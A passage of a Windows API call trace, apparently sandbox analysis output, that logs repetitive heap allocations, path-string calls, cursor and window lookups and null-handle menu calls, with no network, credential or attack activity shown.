[0100.594] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1360 | out: hHeap=0x34d0000) returned 1 [0100.594] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1320 | out: hHeap=0x34d0000) returned 1 [0100.594] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0100.594] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1310 | out: hHeap=0x34d0000) returned 1 [0100.595] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d1310 [0100.595] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x20) returned 0x34d1320 [0100.595] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1348 [0100.595] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1360 [0100.595] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1348 | out: hHeap=0x34d0000) returned 1 [0100.595] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1360 | out: hHeap=0x34d0000) returned 1 [0100.595] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1320 | out: hHeap=0x34d0000) returned 1 [0100.595] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0100.595] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1310 | out: hHeap=0x34d0000) returned 1 [0100.595] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d1310 [0100.595] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x20) returned 0x34d1320 [0100.595] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1348 [0100.595] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1360 [0100.595] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1348 | out: hHeap=0x34d0000) returned 1 [0100.595] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1360 | out: hHeap=0x34d0000) returned 1 [0100.595] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1320 | out: hHeap=0x34d0000) returned 1 [0100.595] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0100.595] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1310 | out: hHeap=0x34d0000) returned 1 [0100.595] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d1310 [0100.595] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x20) returned 0x34d1320 [0100.595] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1348 [0100.595] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1360 [0100.595] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1348 | out: hHeap=0x34d0000) returned 1 [0100.595] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1360 | out: hHeap=0x34d0000) returned 1 [0100.595] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1320 | out: hHeap=0x34d0000) returned 1 [0100.595] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0100.595] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1310 | out: hHeap=0x34d0000) returned 1 [0100.595] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d1310 [0100.595] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x20) returned 0x34d1320 [0100.595] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1348 [0100.595] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1360 [0100.595] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1348 | out: hHeap=0x34d0000) returned 1 [0100.595] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1360 | out: hHeap=0x34d0000) returned 1 [0100.595] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1320 | out: hHeap=0x34d0000) returned 1 [0100.595] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0100.595] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1310 | out: hHeap=0x34d0000) returned 1 [0100.595] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d1310 [0100.595] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x20) returned 0x34d1320 [0100.595] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1348 [0100.595] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1360 [0100.595] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1348 | out: hHeap=0x34d0000) returned 1 [0100.596] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1360 | out: hHeap=0x34d0000) returned 1 [0100.596] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1320 | out: hHeap=0x34d0000) returned 1 [0100.596] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0100.596] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1310 | out: hHeap=0x34d0000) returned 1 [0100.596] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d1310 [0100.596] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x20) returned 0x34d1320 [0100.596] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1348 [0100.596] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1360 [0100.596] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1348 | out: hHeap=0x34d0000) returned 1 [0100.596] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1360 | out: hHeap=0x34d0000) returned 1 [0100.596] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1320 | out: hHeap=0x34d0000) returned 1 [0100.596] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0100.596] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1310 | out: hHeap=0x34d0000) returned 1 [0100.596] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d1310 [0100.596] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x20) returned 0x34d1320 [0100.596] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1348 [0100.596] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1360 [0100.596] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1348 | out: hHeap=0x34d0000) returned 1 [0100.596] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1360 | out: hHeap=0x34d0000) returned 1 [0100.596] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1320 | out: hHeap=0x34d0000) returned 1 [0100.596] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0100.596] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1310 | out: hHeap=0x34d0000) returned 1 [0100.596] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d1310 [0100.596] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x20) returned 0x34d1320 [0100.596] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1348 [0100.596] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1360 [0100.596] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1348 | out: hHeap=0x34d0000) returned 1 [0100.596] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1360 | out: hHeap=0x34d0000) returned 1 [0100.596] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1320 | out: hHeap=0x34d0000) returned 1 [0100.596] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0100.596] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1310 | out: hHeap=0x34d0000) returned 1 [0100.596] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d1310 [0100.596] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x20) returned 0x34d1320 [0100.596] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1348 [0100.596] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1360 [0100.596] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1348 | out: hHeap=0x34d0000) returned 1 [0100.596] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1360 | out: hHeap=0x34d0000) returned 1 [0100.596] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1320 | out: hHeap=0x34d0000) returned 1 [0100.596] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0100.596] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1310 | out: hHeap=0x34d0000) returned 1 [0100.596] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d1310 [0100.597] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x20) returned 0x34d1320 [0100.597] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1348 [0100.597] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1360 [0100.597] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1348 | out: hHeap=0x34d0000) returned 1 [0100.597] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1360 | out: hHeap=0x34d0000) returned 1 [0100.597] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1320 | out: hHeap=0x34d0000) returned 1 [0100.597] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0100.597] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1310 | out: hHeap=0x34d0000) returned 1 [0100.597] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d1310 [0100.597] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x20) returned 0x34d1320 [0100.597] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1348 [0100.597] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1360 [0100.597] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1348 | out: hHeap=0x34d0000) returned 1 [0100.597] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1360 | out: hHeap=0x34d0000) returned 1 [0100.597] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1320 | out: hHeap=0x34d0000) returned 1 [0100.597] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0100.597] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1310 | out: hHeap=0x34d0000) returned 1 [0100.597] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d1310 [0100.597] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x20) returned 0x34d1320 [0100.597] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1348 [0100.597] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1360 [0100.597] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1348 | out: hHeap=0x34d0000) returned 1 [0100.597] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1360 | out: hHeap=0x34d0000) returned 1 [0100.597] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1320 | out: hHeap=0x34d0000) returned 1 [0100.597] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0100.597] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1310 | out: hHeap=0x34d0000) returned 1 [0100.597] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d1310 [0100.597] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x20) returned 0x34d1320 [0100.597] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1348 [0100.597] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1360 [0100.598] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1348 | out: hHeap=0x34d0000) returned 1 [0100.598] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1360 | out: hHeap=0x34d0000) returned 1 [0100.598] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1320 | out: hHeap=0x34d0000) returned 1 [0100.598] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0100.598] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1310 | out: hHeap=0x34d0000) returned 1 [0100.598] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d1310 [0100.598] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x20) returned 0x34d1320 [0100.598] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1348 [0100.598] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1360 [0100.598] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1348 | out: hHeap=0x34d0000) returned 1 [0100.598] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1360 | out: hHeap=0x34d0000) returned 1 [0100.598] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1320 | out: hHeap=0x34d0000) returned 1 [0100.598] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0100.598] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1310 | out: hHeap=0x34d0000) returned 1 [0100.598] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d1310 [0100.598] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x20) returned 0x34d1320 [0100.598] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1348 [0100.598] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1360 [0100.598] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1348 | out: hHeap=0x34d0000) returned 1 [0100.598] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1360 | out: hHeap=0x34d0000) returned 1 [0100.598] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1320 | out: hHeap=0x34d0000) returned 1 [0100.598] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0100.598] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1310 | out: hHeap=0x34d0000) returned 1 [0100.598] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d1310 [0100.598] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x20) returned 0x34d1320 [0100.598] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1348 [0100.598] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1360 [0100.598] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1348 | out: hHeap=0x34d0000) returned 1 [0100.598] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1360 | out: hHeap=0x34d0000) returned 1 [0100.598] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1320 | out: hHeap=0x34d0000) returned 1 [0100.598] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0100.598] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1310 | out: hHeap=0x34d0000) returned 1 [0100.598] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d1310 [0100.598] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x20) returned 0x34d1320 [0100.598] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1348 [0100.598] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1360 [0100.598] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1348 | out: hHeap=0x34d0000) returned 1 [0100.598] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1360 | out: hHeap=0x34d0000) returned 1 [0100.598] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1320 | out: hHeap=0x34d0000) returned 1 [0100.599] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0100.599] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1310 | out: hHeap=0x34d0000) returned 1 [0100.599] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d1310 [0100.599] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x20) returned 0x34d1320 [0100.599] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1348 [0100.599] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1360 [0100.599] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1348 | out: hHeap=0x34d0000) returned 1 [0100.599] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1360 | out: hHeap=0x34d0000) returned 1 [0100.599] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1320 | out: hHeap=0x34d0000) returned 1 [0100.599] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0100.599] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1310 | out: hHeap=0x34d0000) returned 1 [0100.599] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d12f8 | out: hHeap=0x34d0000) returned 1 [0100.599] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d12d0 | out: hHeap=0x34d0000) returned 1 [0100.599] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d12c0 | out: hHeap=0x34d0000) returned 1 [0100.599] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d12c0 [0100.599] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x20) returned 0x34d12d0 [0100.599] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d12f8 [0100.599] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.599] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.599] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.599] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.599] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.599] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.599] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.599] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.599] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.599] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.599] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.599] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.599] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.599] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.599] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.599] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.599] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.599] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.599] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.600] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.600] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.600] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.600] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.600] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.600] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.600] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.600] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.600] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.600] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.600] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.600] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.600] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.600] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.600] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.600] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.600] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.600] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.600] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0100.600] GetStockObject (i=6) returned 0x1b00018 [0100.600] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.600] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.600] PathFileExistsW (pszPath=0x0) returned 0 [0100.600] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.600] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.600] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.600] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.600] GetMenu (hWnd=0x0) returned 0x0 [0100.600] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.601] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.601] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.601] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.601] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.601] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.601] GetStockObject (i=6) returned 0x1b00018 [0100.601] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.601] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.601] PathFileExistsW (pszPath=0x0) returned 0 [0100.601] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.601] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.601] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.601] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.601] GetMenu (hWnd=0x0) returned 0x0 [0100.601] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x344) returned -1 [0100.601] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.601] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.601] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.601] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.601] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.601] GetStockObject (i=6) returned 0x1b00018 [0100.601] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.601] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.601] PathFileExistsW (pszPath=0x0) returned 0 [0100.601] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.602] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.602] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.602] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.602] GetMenu (hWnd=0x0) returned 0x0 [0100.602] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.602] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.602] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.602] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.602] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.602] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.602] GetStockObject (i=6) returned 0x1b00018 [0100.602] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.602] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.602] PathFileExistsW (pszPath=0x0) returned 0 [0100.602] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.602] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.602] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.602] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.602] GetMenu (hWnd=0x0) returned 0x0 [0100.602] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.602] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.602] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.602] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.602] 